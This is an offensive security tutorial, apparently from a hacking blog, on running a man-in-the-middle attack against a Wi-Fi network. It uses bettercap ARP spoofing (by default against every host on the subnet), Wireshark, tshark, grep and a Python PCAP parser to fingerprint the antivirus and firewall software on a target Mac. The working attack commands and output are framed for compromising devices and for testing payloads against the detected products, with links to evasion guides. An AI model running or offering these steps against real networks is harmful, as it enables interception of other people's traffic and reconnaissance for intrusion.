Identifying the security software installed on a MacBook or other Apple computer matters to hackers and penetration testers who need to compromise a device on the network. With a man-in-the-middle attack, the packets leaving the Mac tell us a lot about which antivirus and firewall products are installed.
After gaining access to a Wi-Fi router, a hacker can perform a variety of network-based reconnaissance attacks. On a WPA2-PSK network, traffic can be decrypted by anyone who has the password and a capture of the client's handshake, without ever authenticating to the router. While that method is excellent for passive observation, we'll instead perform a man-in-the-middle attack to learn what's happening on the network.
We'll start by installing a man-in-the-middle tool in Kali Linux. Packets moving through the network are redirected through the attacker's system and collected with Wireshark. The traffic is then open to packet inspection, allowing the attacker to identify the security software installed on the macOS computer.
- Don't Miss: Create an Undetectable macOS Payload with Armor
Bettercap, developed by evilsocket and some cool people, is an extensible and portable offensive security framework. While it features several useful tools, let's focus on the man-in-the-middle functionalities.
Install bettercap in Kali with the following command.
~$ sudo apt update && sudo apt upgrade && sudo apt install bettercap
Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree
Reading state information... Done
17 packages can be upgraded. Run 'apt list --upgradable' to see them.
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages have been kept back:
  crackmapexec gcc-10-base lib32gcc-s1 lib32stdc++6 libatomic1 libcc1-0 libgcc-s1 libgfortran5 libgomp1 libitm1 liblsan0 libobjc4 libquadmath0 libstdc++6 libtsan0 libubsan1 php-common
0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.
Reading package lists... Done
Building dependency tree
Reading state information... Done
bettercap is already the newest version (2.28-0kali2).
0 upgraded, 0 newly installed, 0 to remove and 17 not upgraded.
Before starting the man-in-the-middle attack, create a named pipe with the mkfifo command. Bettercap will write captured packets to the pipe, allowing Wireshark to analyze the traffic in real-time. The "wiretap" file name that I used is arbitrary and can be changed.
~$ mkfifo /tmp/wiretap
Start bettercap with the following options to begin ARP spoofing automatically and write the captured packets to the named pipe. Note that without arp.spoof.targets set, bettercap spoofs every host it discovers on the subnet; set it to the Mac's IP address to limit the attack to the one target.
~$ sudo bettercap -eval "set net.sniff.output /tmp/wiretap; net.sniff on; arp.spoof on"
bettercap v2.28 (built for linux amd64 with go1.14.4) [type 'help' for a list of commands]
[05:44:08] [sys.log] [inf] net.sniff starting net.recon as a requirement for net.sniff
[05:44:08] [endpoint.new] endpoint 192.168.1.47 detected as 7e:13:a9:b6:07:77.
[05:44:08] [sys.log] [inf] arp.spoof enabling forwarding
» [05:44:08] [sys.log] [inf] arp.spoof arp spoofer started, probing 16384 targets.
Wait a few seconds for traffic to appear in the bettercap terminal; opening Wireshark too quickly sometimes caused the man-in-the-middle attack to fail. Then, in a new terminal, open Wireshark with the following command to begin capturing immediately (-k) from the given interface (-i), which here is the named pipe /tmp/wiretap rather than a network interface.
~$ wireshark -k -i /tmp/wiretap
Wireshark will capture and display, in real time, the packets of the spoofed devices as they pass through the attacker's system.
AVG Antivirus, like Avast, is a very well-known antivirus solution for Windows 10, macOS, and Android phones. Because AVG was acquired by Avast in 2016, a MacBook running AVG will be seen connecting to Avast servers.
Antivirus tools periodically fetch software and virus definition updates, and an attacker on the network can observe those requests. With Avira, some of these update checks happen over plain HTTP, so the hostname, path, and headers are all readable.
This traffic can be isolated in Wireshark with the following display filter, which matches the HTTP Host header against the vendors' domains (the (?i) makes the match case-insensitive).
http.host ~ "(?i)(avira|avast|avcdn|avg)"
Expand any of the HTTP streams in Wireshark to find more information about traffic originating from the Mac. In my example, the unique user-agent string strongly suggests an installed application querying Avira servers (i.e., virus definition updates).
At any point, the packet capture can be stopped in Wireshark and exported for further analysis with tools like tshark and NetworkMiner. The command below extracts the User-Agent header from every HTTP request in the PCAP and counts how many times each value appears; the large first count is packets with no User-Agent field, which tshark prints as empty lines. In my case, notice the unique Avira user-agent, which appears almost one hundred times.
~$ tshark -r avira.pcap -n -T fields -e http.user_agent | sort | uniq -c
  22337
     98 @AUVI@1.1; AntiVir-uxupdate-22.214.171.124 (PERS; WKS; EN; AVE 126.96.36.199; VDF 188.8.131.52; Darwin x86_64 18.0.0; ; US; ; 2219669652-SAVXS-0000001; EN-US; 184.108.40.206; 0; 0; 0)
      2 curl/7.54.0
      2 Google Chrome/75.0.3770.80 Mac OS X
All of the information gathered during a five-minute MitM attack strongly suggests that both Avira and Avast (AVG) software are installed on the target Mac. An attacker could use it to replicate the environment and test a payload against those exact products before engaging the target.
LuLu, created by Objective-See, is an open-source firewall and an alternative to Little Snitch for macOS. For a tutorial on how to evade LuLu's detection system, check out "How to Bypass the LuLu Firewall in macOS."
Like most modern software, LuLu has built-in functionality to fetch software updates automatically.
LuLu updates are more difficult to detect because the version check goes over HTTPS: the request and response are encrypted, and the only thing that leaks is the hostname, which the TLS ClientHello carries in clear text in the Server Name Indication (SNI) extension. In the bettercap terminal, the "objective-see.com" hostname will appear when LuLu queries it, but it is easily missed in a stream of traffic.
In Wireshark, press Control-F to open the "Find Packet" search tool. Change the first category to "Packet details," the third category to "String," and search for "objective-see." Wireshark will jump to the nearest packet containing that string. Notice the domain in the packet details, inside the server_name extension of the Client Hello.
- Don't Miss: How to Bypass the LuLu Firewall in macOS
Similarly, the following grep command will search the raw PCAP for any string that appears in clear text, which for TLS traffic means the SNI hostname and little else.
~$ grep -ia 'objective-see' /path/to/capture.pcap
3pdy/3.1spdy/http/1.1objective-see.com
3pdy/3.1spdy/http/1.1objective-see.com
3pdy/3.1spdy/http/1.1objective-see.com
3pdy/3.1spdy/http/1.1objective-see.com
While it's not definitive evidence of a LuLu update, to an attacker on the network it would suggest that one or more Objective-See security tools are installed. From a quick look at the packets generated during a version check, nothing strongly implicated LuLu specifically: the request itself is encrypted, so only the hostname leaks. Either way, the data suggests the target is security conscious.
With a list of the update and telemetry domains used by popular antivirus products, an attacker can usually say with confidence whether a target macOS device has security software installed. Worse, with the Wi-Fi password in hand, the same enumeration can be done passively without ever connecting to the network.
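The Host/User-Agent matching used for Avira and Avast above and the SNI inspection used for LuLu can be done in one pass over an exported PCAP. The Python script below is an added example written for this article; it is not part of bettercap, Wireshark, tshark, or the author's workflow. It parses a classic pcap file (Ethernet/IPv4/TCP), pulls the Host and User-Agent headers out of plain-HTTP requests and the server_name out of TLS ClientHellos, and tallies which vendors the target talked to. The vendor table, the ".example" hostnames, the shortened user-agent, and the sample capture it builds in memory are all constructed for the demonstration; to use it on a real export, call fingerprint() on the bytes of your capture file.

```python
import struct
from collections import Counter

# Host substring -> product label. Constructed table (an assumption); extend for other vendors.
VENDOR_HOSTS = {"avira": "Avira", "avast": "Avast/AVG", "avcdn": "Avast/AVG",
                "avg": "Avast/AVG", "objective-see": "Objective-See (LuLu and others)"}

def tcp_payloads(pcap):
    """Yield non-empty TCP payloads from a classic pcap (Ethernet/IPv4/TCP only)."""
    endian = "<" if struct.unpack("<I", pcap[:4])[0] == 0xA1B2C3D4 else ">"
    off = 24                                       # skip the 24-byte global header
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "I", pcap[off + 8:off + 12])[0]
        frame, off = pcap[off + 16:off + 16 + incl_len], off + 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                               # not IPv4, or IPv4 but not TCP
        ip = frame[14:14 + struct.unpack("!H", frame[16:18])[0]]   # drops Ethernet padding
        tcp = ip[(ip[0] & 0x0F) * 4:]
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield payload

def parse_http_request(payload):
    """Return (host, user_agent) for a plain-text HTTP request, else None."""
    if not payload.startswith((b"GET ", b"POST ", b"HEAD ", b"PUT ")):
        return None
    lines = payload.split(b"\r\n\r\n", 1)[0].decode("latin-1").split("\r\n")[1:]
    hdr = {k.strip().lower(): v.strip() for k, _, v in (ln.partition(":") for ln in lines)}
    return hdr.get("host", ""), hdr.get("user-agent", "")

def parse_sni(payload):
    """Return server_name from a TLS ClientHello (record type 0x16, handshake 0x01), else None."""
    try:
        if payload[0] != 0x16 or payload[5] != 0x01:
            return None
        p = 44 + payload[43]                                     # skip headers, random, session id
        p += 2 + struct.unpack("!H", payload[p:p + 2])[0]        # cipher suites
        p += 1 + payload[p]                                      # compression methods
        end = p + 2 + struct.unpack("!H", payload[p:p + 2])[0]   # extensions block
        p += 2
        while p + 4 <= end:
            etype, elen = struct.unpack("!HH", payload[p:p + 4])
            if etype == 0:    # server_name: list_len(2) name_type(1) name_len(2) name
                nlen = struct.unpack("!H", payload[p + 7:p + 9])[0]
                return payload[p + 9:p + 9 + nlen].decode("ascii", "replace")
            p += 4 + elen
    except (IndexError, struct.error):
        pass                                                     # truncated or not a ClientHello
    return None

def fingerprint(pcap):
    """Return ({vendor: set of hosts}, Counter of user-agents): the filter and uniq -c in one pass."""
    hits, agents = {}, Counter()
    for payload in tcp_payloads(pcap):
        req = parse_http_request(payload)
        if req:
            host, ua = req
            agents[ua] += 1
        else:
            host = parse_sni(payload)
        for needle, vendor in VENDOR_HOSTS.items():
            if host and needle in host.lower():
                hits.setdefault(vendor, set()).add(host)
    return hits, agents

def _frame(payload):
    """Constructed sample data: minimal Ethernet/IPv4/TCP wrapper, checksums left zero."""
    tcp = struct.pack("!HHIIBBHHH", 50000, 443, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0, 64, 6, 0,
                     bytes([192, 168, 1, 47]), bytes([203, 0, 113, 10]))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload

def build_pcap(payloads):
    """Constructed sample data: classic little-endian pcap file, linktype 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, pl in enumerate(payloads):
        fr = _frame(pl)
        out += struct.pack("<IIII", 1600000000 + i, 0, len(fr), len(fr)) + fr
    return out

def client_hello(server_name):
    """Constructed sample data: minimal TLS 1.2 ClientHello whose only extension is SNI."""
    name = server_name.encode()
    sni = struct.pack("!HBH", len(name) + 3, 0, len(name)) + name
    ext = struct.pack("!HH", 0, len(sni)) + sni
    body = (b"\x03\x03" + b"\x00" * 32 + b"\x00"            # version, random, empty session id
            + b"\x00\x02\xc0\x2f" + b"\x01\x00"             # one cipher suite, null compression
            + struct.pack("!H", len(ext)) + ext)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs

AVIRA_UA = b"AntiVir-uxupdate (PERS; WKS; EN; Darwin x86_64 18.0.0)"   # shortened, made up
SAMPLE_PCAP = build_pcap([                                             # constructed, not real traffic
    b"GET /idx/master.idx HTTP/1.1\r\nHost: update.avira.example\r\nUser-Agent: " + AVIRA_UA + b"\r\n\r\n",
    b"GET /idx/vdf.idx HTTP/1.1\r\nHost: update.avira.example\r\nUser-Agent: " + AVIRA_UA + b"\r\n\r\n",
    b"GET /mac/ HTTP/1.1\r\nHost: download.avcdn.example\r\nUser-Agent: curl/7.54.0\r\n\r\n",
    client_hello("objective-see.com"),
    client_hello("www.apple.com"),
])
```

Running fingerprint(SAMPLE_PCAP) attributes the two Avira update requests and the avcdn download to their vendors and picks objective-see.com out of the ClientHello even though nothing else in that connection is readable; www.apple.com is seen but matches no vendor. The substring table is deliberately loose (for example "avg" will also hit unrelated hosts containing those letters), so treat a hit as a lead to confirm in Wireshark rather than proof on its own.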
Follow me on Twitter @tokyoneon_ to keep up with my current projects. For questions and concerns, leave a comment or message me on Twitter.